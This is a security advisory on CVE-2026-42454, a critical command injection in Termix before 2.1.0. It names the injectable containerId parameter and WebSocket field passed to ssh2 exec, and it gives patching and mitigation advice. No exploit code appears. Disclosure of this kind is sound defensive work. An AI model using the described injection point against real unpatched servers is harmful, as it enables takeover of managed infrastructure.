Termix server RCE via shell injection (CVE-2026-42454)

Patch now - CVE-2026-42454 is a critical OS command injection vulnerability in Termix prior to version 2.1.0 that lets authenticated attackers achieve remote code execution on any managed server. Patched in version 2.1.0 - update immediately.

Overview

CVE-2026-42454 affects the Termix web-based server management platform, specifically its Docker container management endpoints. The vulnerability stems from Termix interpolating the containerId URL path parameter and WebSocket message field directly into shell commands executed via ssh2.Client.exec() on remote managed servers. No sanitization or validation is applied to these inputs, allowing an authenticated attacker to inject arbitrary OS commands by crafting a malicious container ID.

This issue is classified as CRITICAL with a CVSS score of 9.9, reflecting the low attack complexity, network-based attack vector, and lack of user interaction required to exploit it.

Impact

An attacker with low-privilege authenticated access to a Termix instance can execute arbitrary operating system commands on any server managed through the platform. This effectively grants full control over managed infrastructure, including the ability to:

• Deploy malware, ransomware, or cryptocurrency miners
• Exfiltrate sensitive data, credentials, and configuration files
• Pivot to other systems within the same network
• Disrupt or destroy services, leading to operational downtime

Because Termix manages SSH terminals, tunneling, and file editing, a successful compromise could cascade across the entire managed fleet.

Remediation and Mitigation

The vulnerability has been patched in Termix 2.1.0. Organizations using Termix should:

• Upgrade immediately to version 2.1.0 or later. No other versions are known to be safe.
• If immediate patching is not possible, restrict network access to the Termix web interface to trusted IP addresses only.
• Audit all existing Termix sessions and container operations for signs of compromise, given the low complexity of exploitation.
• Review authentication logs for anomalous container management requests, particularly those with unusual or long container ID strings.

There are no workarounds that fully address the vulnerability without upgrading.

Security Insight

This vulnerability represents a recurring pattern in management platforms: trusting user-supplied data in shell commands without validation. Similar issues have plagued tools like Kubernetes dashboard plugins and remote management consoles where container identifiers are treated as trusted parameters. Termix’s architecture of executing commands on remote servers via SSH amplifies the risk because each managed server becomes a potential beachhead. The critical takeaway is that any API endpoint that constructs shell commands from user input must treat that input as untrusted, regardless of authentication status. Vendors like Termix should adopt parameterized execution methods or strict allowlists for container IDs to prevent entire classes of injection attacks.

Further Reading

• All Critical Vulnerabilities
• Recent Critical Vulnerabilities
• Top Critical CVEs